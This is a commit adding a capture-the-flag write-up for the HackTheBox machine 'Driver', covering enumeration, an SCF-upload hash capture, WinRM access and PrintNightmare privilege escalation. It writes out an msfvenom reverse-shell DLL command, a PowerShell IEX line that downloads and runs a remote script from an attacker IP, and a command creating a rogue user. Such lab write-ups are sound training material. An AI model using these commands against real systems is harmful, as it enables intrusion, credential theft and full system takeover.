Create Driver.md

HackTheBox/Driver.md

@@ -0,0 +1,154 @@
+# HackTheBox-Driver
+
+## NMAP 
+
+```bash  
+PORT    STATE SERVICE      REASON          VERSION    
+80/tcp  open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
+| http-auth: 
+| HTTP/1.1 401 Unauthorized\x0D                                           
+|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
+| http-methods:              
+|   Supported Methods: OPTIONS TRACE GET HEAD POST
+|_  Potentially risky methods: TRACE
+|_http-server-header: Microsoft-IIS/10.0
+|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
+135/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
+445/tcp open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
+5985/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                                                 
+|_http-server-header: Microsoft-HTTPAPI/2.0                               
+|_http-title: Not Found        
+Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+```
+
+## PORT 139/445 (SMB)
+
+<img src="https://i.imgur.com/IBXHYKS.png"/>
+
+Checking smb share through anonymous login it seems we don't have access it to it so let's move on to web server
+
+## PORT 80 (HTTP)
+
+<img src="https://i.imgur.com/0mkBrUB.png"/>
+
+On visiting web server , it's going to ask credentials so let's try `admin;admin` to see if this works
+
+<img src="https://i.imgur.com/NVhljZR.png"/>
+
+And it did it ,so let's see what we have here
+
+<img src="https://i.imgur.com/95fm27D.png"/>
+
+It's running on php , I checked to include index file with `php` extension and this loaded the page so this page is written on php so just some basic enumeration here. There are only two pages here , the other page is about uploading a firmware for the printer
+
+<img src="https://i.imgur.com/GnxJ2Mp.png"/>
+
+I tried uploading something but it doesn't seem that I can access that file from anywhere so I ran `gobuster` and it also didn't found anyhing interesting
+
+<img src="https://i.imgur.com/NuH6pdP.png"/>
+
+Now I kept thinking but nothing was coming to my mind until I focused on these lines " upload the respective firmware update to our file share" , so maybe the file we upload here is going to smb share , so here I learned a new attack which is known as SCF File attack `Shell Command File`.
+
+So we need to create a `.scf` file , it will look like this
+
+<img src="https://i.imgur.com/L2NWqDM.png"/>
+
+Now we will have to upload this file and at the same time run `responder` to catch NTMLv2 hash
+
+```bash
+responder -I tun0 -rdw -v 
+```
+
+<img src="https://i.imgur.com/HkapBfq.png"/>
+
+Just copy any of the hash , they all are the same, the only different is the time difference (in seconds) and save the hash in a file , and crack  it with `hashcat` 
+
+<img src="https://i.imgur.com/W81nBqI.png"/>
+
+<img src="https://i.imgur.com/bJX5GI2.png"/>
+
+Now to verify if we have valid creds , we can use `crackmapexec` to verify it on smb
+
+<img src="https://i.imgur.com/1pz9Fgr.png"/>
+
+<img src="https://i.imgur.com/UdIj8xJ.png"/>
+
+We only have read access here so we can't get a shell using `smbexec` or `psexec`. Since WinRM is open (port 5985) , we can check if we can get a shell with that
+
+<img src="https://i.imgur.com/MmHkNMh.png"/>
+
+It's showing us the status "pwned" meaning that we can get a shell
+
+<img src="https://i.imgur.com/1SYEpTi.png"/>
+
+## Privilege Escalation (Print Nightmare Python)
+
+Assuming from the web page that there's a print spooler service running , we can test if we can exploit `PrintNightmare` , now this requires some setup as we need to clone the specifc impacket repo 
+
+https://github.com/cube0x0/CVE-2021-1675
+
+After cloning it we would then have to run `python3 ./setup.py install` and copy the contents of `CVE-2021-1675.py` , start the smb server using `service smbd restart` and generate a dll reverse shell
+
+```bash
+msfvenom  x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.125 LPORT=2222 -f dll -o /var/smb/shell.dll
+```
+
+Make sure that you have made read access to other group for this file
+
+<img src="https://i.imgur.com/8EuX6wy.png"/>
+
+<img src="https://i.imgur.com/LbV1F2Y.png"/>
+
+Now to lauch the script and catch the shell
+
+<img src="https://i.imgur.com/h7cqJzw.png"/>
+
+<img src="https://i.imgur.com/OmUARkO.png"/>
+
+
+## Print Nightmare (Powershell)
+
+We can achieve SYSTEM on this machine through powershell as well , without the need of setting up a smb server 
+
+So we'll use this POC for the pring nightmare exploit
+
+https://github.com/calebstewart/CVE-2021-1675
+
+<img src="https://i.imgur.com/xf9SfW9.png"/>
+
+After transferring it to target machine , let's import the ps1 file. But if we try to import the script , it's going to show us an error "running scripts is disabled on this system"
+
+<img src="https://i.imgur.com/RjZRgk7.png"/>
+
+So to bypass this , we need to download the file using `IEX`
+
+```powershell
+IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.120/nightmare.ps1');
+```
+
+<img src="https://i.imgur.com/wsaPL90.png"/>
+
+An advantage of downloading it this way is that not only it downloads the file but it will actually import the script so we don't have to import it manually
+
+```powershell
+Invoke-Nightmare -NewUser "USER" -NewPassword "PASS"
+```
+
+<img src="https://i.imgur.com/aFTw2a1.png"/>
+
+We can see that the user has been created 
+
+<img src="https://i.imgur.com/FGrijZM.png"/>
+
+And we can then just switch to this user by logging in with `evil-winrm` 
+
+<img src="https://i.imgur.com/6QZffHz.png"/>
+
+## References
+
+- https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/
+- https://www.jaacostan.com/2021/07/printnightmare-cve-2021-1675-poc.html
+- https://github.com/cube0x0/CVE-2021-1675
+- https://github.com/calebstewart/CVE-2021-1675
+- https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70